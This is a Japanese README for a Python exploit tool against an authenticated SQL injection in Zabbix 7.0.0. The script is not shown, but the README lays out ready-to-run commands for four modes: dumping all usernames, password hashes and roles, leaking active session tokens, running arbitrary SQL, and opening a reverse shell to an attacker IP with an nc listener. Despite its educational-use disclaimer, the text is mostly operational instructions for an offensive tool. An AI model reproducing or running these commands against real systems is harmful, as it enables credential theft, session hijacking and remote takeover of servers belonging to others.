
これは教育目的のみです。許可されていないシステムに対して使用しないでください。
認証済みのZabbix 7.0.0 SQLインジェクション脆弱性を悪用するPythonスクリプトで、ユーザーデータ抽出、セッショントークン漏洩、リモートコマンド実行(RCE)、カスタムクエリインジェクションなど、複数の動作モードをサポートしています。
⚠️ 免責事項:
このスクリプトは教育目的および許可されたペネトレーションテストのみを対象としています。
所有していない、または明示的なテスト許可がないシステムでは使用しないでください。
著者は、このツールの誤用またはそれによって生じた損害について一切の責任を負いません。
requests ライブラリ必要に応じて依存関係をインストール:
pip install requests
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
| モード | 説明 | 管理者トークンが必要か |
|---|---|---|
| leak-users | すべてのユーザーID、ユーザー名、パスワードハッシュ、ロールをダンプ | ❌ |
| leak-tokens | データベースからすべてのアクティブなセッションIDをダンプ | ❌ |
| rce | item.createエクスプロイトを介してリバースシェルを起動 | ✅ |
| custom | インジェクションを介して任意のカスタムSQLクエリを実行 | ❌ |
ユーザーハッシュのダンプ
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
セッショントークンの漏洩
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
リモートコード実行(リバースシェル)
# Start a listener first:
nc -lvnp 9001
# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
カスタムSQLインジェクション
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
sqliZabbix.py # Main exploit script
README.md # This documentation
Anthony (@874anthony)
愛情と好奇心を込めて作成 🐍
このプロジェクトはMITライセンスの下で公開されています。責任を持ってご使用ください。